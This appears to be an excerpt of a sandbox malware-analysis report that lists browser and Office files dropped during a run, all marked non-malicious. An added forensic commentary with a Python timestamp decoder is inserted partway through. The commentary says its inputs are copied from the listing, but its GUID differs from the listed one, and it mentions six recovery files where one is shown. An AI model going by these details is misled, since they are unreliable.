                                                                                                                                                            SSDEEP:96:r3ZgQE6OBSxjt2pWqMSFnXN2l9S5d1n9XN2l9SXA:r3ZgQE6Okxjt2pWqMSFXUy5d1FUyXA
                                                                                                                                                            MD5:D522B3AA351CCC731B023D0868FCD450
                                                                                                                                                            SHA1:D58CD2A468F6636DA0735500188A8DC7A31DF65C
                                                                                                                                                            SHA-256:585B9E3F9E541EDB499CAC51579AE518A7D8A8620EAD2EAF1EFBB3B410E11C52
                                                                                                                                                            SHA-512:FA8A43DC85369E24CC4C7691A4F6BD5C48CD9462A61304DEC391223BB18DD80063ABA4C28667D542A6612560647B8A6B8365EB80E606652399665EBECA6FD92B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAAC-E03E-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28172
                                                                                                                                                            Entropy (8bit):1.925227833078679
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:rUZTQb6Vk/jh2dWdM1tF12AHTTNk6tTlF12AHR12AHTTNk6tuA:rEcee7Q0u7n2AHnNbtZn2AHj2AHnNbtJ
                                                                                                                                                            MD5:EA707C8E29A33783E7714DDA936A6482
                                                                                                                                                            SHA1:6C033200001FEF5CE739C230A8B4F0D35272EC5A
                                                                                                                                                            SHA-256:7BAB32166C9B720E975784A0D20D29E7A283710166AFA9BA6AAB2A2D6F1CD6C2
                                                                                                                                                            SHA-512:C63B113B2C98E82D1533907B3E8806BF7152E81FDD6A3BC47E6DE8E4B17ABE93F2EE8737FF0F7C239B928B97811FBD4FB5521560711F66BB6CB5C163C698B5B2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):656
                                                                                                                                                            Entropy (8bit):5.146197797552912
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxOEiHP9HPAnWimI002EtM3MHdNMNxOEiHP9HPAnWimI00ObVbkEtMb:2d6NxOLPRPASZHKd6NxOLPRPASZ76b
                                                                                                                                                            MD5:F76485029FC4D51ED000A71E2D921677
                                                                                                                                                            SHA1:AB5DE9BC6DC6687110ACE30E45E78A7D6B5B2C14
                                                                                                                                                            SHA-256:06CE8BBA607FC68C3387149257A9D9EA7BF5DCAD102F1832A7855F18BA8EF7BB
                                                                                                                                                            SHA-512:49E65EC5F1317F7E5846EFC139EA850E47D493ED5FB37A188EE5C8F0A842B537092A3352B127B5B4C4AA71E7C242649B299408F41CD08D6674F864173E953C86
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):653
                                                                                                                                                            Entropy (8bit):5.152356522543803
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxe2kBHPmHPAnWimI002EtM3MHdNMNxe2kBHPmHPAnWimI00Obkak6EtMb:2d6NxrOPsPASZHKd6NxrOPsPASZ7Aa7b
                                                                                                                                                            MD5:F432DD266A0B5AA4C4205FA62766D1DC
                                                                                                                                                            SHA1:D52025B91E0616A99C1D89BE069BD4AB5B552F72
                                                                                                                                                            SHA-256:E5BB1A8751CAE9776C9E3DDC37AAF3BD1F8108D34459A4E27FAC794D1069931F
                                                                                                                                                            SHA-512:CBA479714BDBD445DC77FB1DE97E16FFF5B5A82D166469AB07F0A29EB0ED036695108AE592FE13AC7D51DA7ACFDD603DAC46207815E3E56AFA619EB7172D233A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):662
                                                                                                                                                            Entropy (8bit):5.165732408111604
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxvLiHP9HPAnWimI002EtM3MHdNMNxvLiHP9HPAnWimI00ObmZEtMb:2d6NxvkPRPASZHKd6NxvkPRPASZ7mb
                                                                                                                                                            MD5:7F83B8E29E376568823D4452E4DF32DE
                                                                                                                                                            SHA1:11B0F37B6192D02724341CE10AD5EB489ED8F9C9
                                                                                                                                                            SHA-256:B5ADA2D7D5D7A468A62E659662E10C36876338BAAD0E7202B4569C57E61D2050
                                                                                                                                                            SHA-512:5421CDBD73433F3BFEC690259C8CE001DFCDEFF889921F7EBC61A2EA1DE559349F44945797D5B189B156E1669FBC7B74F8488EC2B1CE48934C4C22FBC43B8DAE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):647
                                                                                                                                                            Entropy (8bit):5.1626781975834435
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxiiHP9HPAnWimI002EtM3MHdNMNxiiHP9HPAnWimI00Obd5EtMb:2d6NxlPRPASZHKd6NxlPRPASZ7Jjb
                                                                                                                                                            MD5:74D4581F7014B22CC25A8028824D5535
                                                                                                                                                            SHA1:553BF507C0D4DA936063C99BF1A77E03A7D088DB
                                                                                                                                                            SHA-256:A635AD60F47FC9E1F5DFCCC476008D99047B8C5B60B6CD1C5DBF4FD795E3BED6
                                                                                                                                                            SHA-512:675BCB45EAE4B7A40D51B90EB9B0D69E13737897BAB070988C4AF59D62914EA53C1B295FB3A2C611A6A5256A91C038B95B6858544A0226F1314AB1AABD2749D6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
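A note on the two artifact families listed above, followed by an added triage example. The six Recovery\High\Active\{...}.dat files are Internet Explorer session-recovery stores: the "R.o.o.t. .E.n.t.r.y" visible in each preview is the UTF-16LE "Root Entry" directory name of an OLE compound file, which is why the file-type heuristic labels them "Microsoft Word Document" even though they hold no Word content, and the report marks every one of them Malicious:false. The msapplication.xml files are IE pinned-site tile records for the VM's own favourites (twitter, amazon, wikipedia, live). Both carry timestamps worth pulling during triage: the GUID in each .dat name is a version-1 UUID with an embedded clock value, and the <date>/<accdate> pairs in the XML are taken here to be a Windows FILETIME split into its low and high DWORDs (that ordering is an assumption; it is supported by the decoded value landing within seconds of the UUID clock). The Python below is an added example, not part of the Joe Sandbox report; its inputs are copied from the entries above and embedded inline as constructed strings. One practical wrinkle it handles: each msapplication.xml is two XML documents back to back, so a single parse call fails with "junk after document element".

```python
"""Decode the timestamps embedded in the IE artifacts from the report above:
session-recovery .dat file names (version-1 UUID) and pinned-site
msapplication.xml tiles (FILETIME low/high DWORD pairs)."""
import re
import uuid
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

# Constructed sample: one recovery store path copied from the listing above.
RECOVERY_DAT = (r"C:\Users\user\AppData\Local\Microsoft\Internet Explorer"
                r"\Recovery\High\Active\{7879BAA4-E03E-11EB-90E4-ECF4BB862DED}.dat")

# Constructed sample: content of the pin-17529550060 msapplication.xml as shown
# in its preview (two XML documents concatenated, CRLF terminators).
TILE_XML = (
    '<?xml version="1.0" encoding="utf-8"?>\r\n'
    '<browserconfig><msapplication><config><site src="http://www.twitter.com/"/>'
    '<date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config>'
    '<tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile>'
    '</msapplication></browserconfig>\r\n'
    '<?xml version="1.0" encoding="utf-8"?>\r\n'
    '<browserconfig><msapplication><config><site src="http://www.twitter.com/"/>'
    '<date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config>'
    '<tile><wide310x150logo/><square310x310logo/><square70x70logo/>'
    '<favorite src="C:\\Users\\user\\Favorites\\Twitter.url"/></tile>'
    '</msapplication></browserconfig>\r\n'
)

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)   # Windows FILETIME epoch
UUID_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)     # RFC 4122 v1 epoch


def filetime_pair_to_utc(text):
    """'0xLOW,0xHIGH' -> aware UTC datetime.
    Assumption: the pair is the low and high DWORDs of a FILETIME (100 ns ticks)."""
    low, high = (int(part, 16) for part in text.split(","))
    ticks = (high << 32) | low
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def uuid1_to_utc(guid):
    """Version-1 UUID -> aware UTC datetime from its 60-bit timestamp field
    (100 ns ticks since 1582-10-15). Returns None for any other UUID version."""
    u = uuid.UUID(guid)
    if u.version != 1:
        return None
    return UUID_EPOCH + timedelta(microseconds=u.time // 10)


def recovery_store_time(path):
    """Creation time embedded in a Recovery\\...\\{GUID}.dat file name, or None."""
    m = re.search(r"\{([0-9A-Fa-f-]{36})\}\.dat$", path)
    return uuid1_to_utc(m.group(1)) if m else None


def parse_tile_xml(text):
    """Parse an IE msapplication.xml that contains several concatenated documents.
    Splitting on the XML declaration and parsing each piece avoids the
    'junk after document element' error a single ET.fromstring() would raise."""
    docs = [d for d in re.split(r"<\?xml[^>]*\?>", text) if d.strip()]
    records = []
    for doc in docs:
        root = ET.fromstring(doc.strip())
        cfg = root.find("./msapplication/config")
        fav = root.find("./msapplication/tile/favorite")
        records.append({
            "site": cfg.find("site").get("src"),
            "created": filetime_pair_to_utc(cfg.findtext("date")),
            "accessed": filetime_pair_to_utc(cfg.findtext("accdate")),
            "favorite": fav.get("src") if fav is not None else None,
        })
    return records


if __name__ == "__main__":
    print("recovery store created:", recovery_store_time(RECOVERY_DAT))
    for rec in parse_tile_xml(TILE_XML):
        print(rec)
```

Both clocks decode to 2021-07-08 22:47 UTC, about eight seconds apart, which is what you expect from files the analysis VM's own browser wrote during the run rather than from anything carried in by the sample; a .dat name whose UUID time predates the run, or a tile whose site is not one of the VM's favourites, would be the thing to look at more closely.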
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):656
                                                                                                                                                            Entropy (8bit):5.1772982971017845
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxhGwiHP9HPAnWimI002EtM3MHdNMNxhGwiHP9HPAnWimI00Ob8K075Ety:2d6NxQ/PRPASZHKd6NxQ/PRPASZ7YKa/
                                                                                                                                                            MD5:ACA8AE0B58705E0C5084DEBF232D41D8
                                                                                                                                                            SHA1:816C94356880740F9A42D7153FDAA0171278F0B7
                                                                                                                                                            SHA-256:D5A756E2B28349FD5AFB3D71B6F9A718D4206BB4A1A0C8E87528798AEF579A33
                                                                                                                                                            SHA-512:A92B7176118B0C3C4B15AB6740FE2D86041345343C6F41EC5AA9A4983ABF6768E7116A122D6ADE5DE4985D9A1D503AB38C4243027702890049D9A623FAAC0644
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):653
                                                                                                                                                            Entropy (8bit):5.149606845977576
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNx0niHP9HPAnWimI002EtM3MHdNMNx0niHP9HPAnWimI00ObxEtMb:2d6Nx0IPRPASZHKd6Nx0IPRPASZ7nb
                                                                                                                                                            MD5:68E59FC6C72262D7F1CF539CAB32FEA9
                                                                                                                                                            SHA1:9D8C50D3263CC4DADF40A67D1C3286FB72826915
                                                                                                                                                            SHA-256:281B190131D55C2CE519EE5A3E600B77BD623A2BE37D1C5040649A691F9E6883
                                                                                                                                                            SHA-512:BDFC78821D308AA9C510F66B89CFCFA93EE43DB50494E2F1ABBBD8000400AA1B5AEF6B839217BA58D182D679CB54AB2C3E39C1E2B5BD2DFD7EF34D7AC9F2A312
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):656
                                                                                                                                                            Entropy (8bit):5.186621498823608
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxxiHP9HPAnWimI002EtM3MHdNMNxxiHP9HPAnWimI00Ob6Kq5EtMb:2d6NxWPRPASZHKd6NxWPRPASZ7ob
                                                                                                                                                            MD5:C7F876206360C67ED70EB3F2D2685C7C
                                                                                                                                                            SHA1:3E7E92C708D3E9A5B639595C1F287BF94B7F0A26
                                                                                                                                                            SHA-256:7A34373A33707952AFBE0C34F34CC45D1EEAA1EDC3F33FE0EF714DC7037C06B5
                                                                                                                                                            SHA-512:4CC339188CFDD3B0519EA18F4E6CB952D11E06967DA5F77C12C512A3BD785DDF4845DB368FF3C0AFC54C47575FCCD2277BA2B58D9391A96388EA75C10C86D310
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):659
                                                                                                                                                            Entropy (8bit):5.14702830312792
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxcBHPmHPAnWimI002EtM3MHdNMNxcBHPmHPAnWimI00ObVEtMb:2d6Nx2PsPASZHKd6Nx2PsPASZ7Db
                                                                                                                                                            MD5:3517B303BFEC51E792DBC9D12EF620E5
                                                                                                                                                            SHA1:C46BC32F66B232E5208B50264C298EF17478DDE3
                                                                                                                                                            SHA-256:9B832359F5608F5D52DC779FF99AE85B96EBF31E74B5AE65C3F2357CB7FBB06C
                                                                                                                                                            SHA-512:ABF36994017705CFAB791889639CE3B18715CDBC6D5BB8AFA11890D0E9FC1A15B568BC088BDF29063906887CB5ADDCA6E499D9167E92C42EE670227D1EC102A3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):653
                                                                                                                                                            Entropy (8bit):5.130796255197012
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TMHdNMNxfnBHPmHPAnWimI002EtM3MHdNMNxfnBHPmHPAnWimI00Obe5EtMb:2d6NxdPsPASZHKd6NxdPsPASZ7ijb
                                                                                                                                                            MD5:2A87457A6C3F87D17C645908B4BF37D2
                                                                                                                                                            SHA1:467BBFFA27D6FFF3616C0A5745A9248EE096527C
                                                                                                                                                            SHA-256:5D284F4DAD6737C1700C6545859514C0E7BF46EEA48126F134E27729B5C1F683
                                                                                                                                                            SHA-512:B06E7CF276108CC9EA32252F62D684C69E12859093E42AD4CF2F813CD87302CAD603B79958202988B05E7435B7DC3D1A27AAA8032FE92C1439C3B26D10F003FD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3A4E1985-998D-4759-B374-77BB71813A62
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):135209
                                                                                                                                                            Entropy (8bit):5.363079740300261
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:ecQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:4EQ9DQW+zwXO1
                                                                                                                                                            MD5:3841AC8D65B710A3695EC5D39A02F2E2
                                                                                                                                                            SHA1:2A507453669FA7692D8C2F2B867900D9FE776B94
                                                                                                                                                            SHA-256:1D3689B9C732037A759788EE407DCA86ACFA8853F37D7BDEFE5A0B4E46231C50
                                                                                                                                                            SHA-512:BDE5E8EC071C24E777D9E33FEDC480D1A590FAAAD867FFE13871A59C0DE17821E4AA0CAD469EDA666CF0F1B5527B10A2FA9A323CEAB59F16FE2BB343C418EC35
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-07-08T13:45:10">.. Build: 16.0.14306.30528-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E633A7EE.jpg
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1684x1191, frames 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):182763
                                                                                                                                                            Entropy (8bit):7.976853204439468
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:Sp1+wnp/jn5IKWPOKmK+BLPnYdP9ImTR35MM+mEGJ0fPjiw2/1MX92lCn5yx5bw:41+wnpxKSBzKdpGmEzn2OXEUuw
                                                                                                                                                            MD5:B0F3E5C5562C746FC4EEBA4CFFAE36CE
                                                                                                                                                            SHA1:7C65093408165AE6672EF63DA46A04C60491DFE6
                                                                                                                                                            SHA-256:C5B922DFDDE5759B37558050C48BC9053E6698B463F5D3A39865E23445AFCBC8
                                                                                                                                                            SHA-512:43AE436E227ED182C273979A3E10CAF403B12479D800D7BA410B754D83CF884FCED4CEFEAA2158B4633C37F934FD270A4F757E6B083AC0F836DCF83F2DCA77D6
                                                                                                                                                            Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FCD9B161.jpg
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1684x1191, frames 3
Category:dropped
Size (bytes):182763
Entropy (8bit):7.976853204439468
Encrypted:false
SSDEEP:3072:Sp1+wnp/jn5IKWPOKmK+BLPnYdP9ImTR35MM+mEGJ0fPjiw2/1MX92lCn5yx5bw:41+wnpxKSBzKdpGmEzn2OXEUuw
MD5:B0F3E5C5562C746FC4EEBA4CFFAE36CE
SHA1:7C65093408165AE6672EF63DA46A04C60491DFE6
SHA-256:C5B922DFDDE5759B37558050C48BC9053E6698B463F5D3A39865E23445AFCBC8
SHA-512:43AE436E227ED182C273979A3E10CAF403B12479D800D7BA410B754D83CF884FCED4CEFEAA2158B4633C37F934FD270A4F757E6B083AC0F836DCF83F2DCA77D6
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\o596c7z[1].htm
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):258256
Entropy (8bit):5.999933884008133
Encrypted:false
SSDEEP:6144:+/l4ukVJZe85j6DyuC15gLFoQzGyfLPqW0j61kafk2sfkWzUheG0qE:+/lMfWCQGIOWvZBCkWgheGbE
MD5:551D610AB28E2FA1D45F38FB17F165BB
SHA1:CD94C081766B277A08DBDE62EA34B0E8EB73BA67
SHA-256:150199FDE5CEF83225A5981568F73C2F9FA36E7D5D98C25A05FACCBC76D8E96C
SHA-512:549D95DF5A43DD9CD9EA83D1FF40845215EB0CE69DC6C8E9B57221F3A8E7AFB41DCD43015016CBBF93B045E93BBB556A9F829992B0B1D7B375564952AB99AE1E
Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\M8anWcq[1].htm
                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):258256
                                                                                                                                                            Entropy (8bit):5.999933884008133
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:+/l4ukVJZe85j6DyuC15gLFoQzGyfLPqW0j61kafk2sfkWzUheG0qE:+/lMfWCQGIOWvZBCkWgheGbE
                                                                                                                                                            MD5:551D610AB28E2FA1D45F38FB17F165BB
                                                                                                                                                            SHA1:CD94C081766B277A08DBDE62EA34B0E8EB73BA67
                                                                                                                                                            SHA-256:150199FDE5CEF83225A5981568F73C2F9FA36E7D5D98C25A05FACCBC76D8E96C
                                                                                                                                                            SHA-512:549D95DF5A43DD9CD9EA83D1FF40845215EB0CE69DC6C8E9B57221F3A8E7AFB41DCD43015016CBBF93B045E93BBB556A9F829992B0B1D7B375564952AB99AE1E
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\gWg[1].htm
                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2468
                                                                                                                                                            Entropy (8bit):5.978095281262444
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:N8EDibBvAI07bJm723rr7tnlAk4VHRGhNN/pZWpiQD9:BDibhi74723RyVHo4pia9
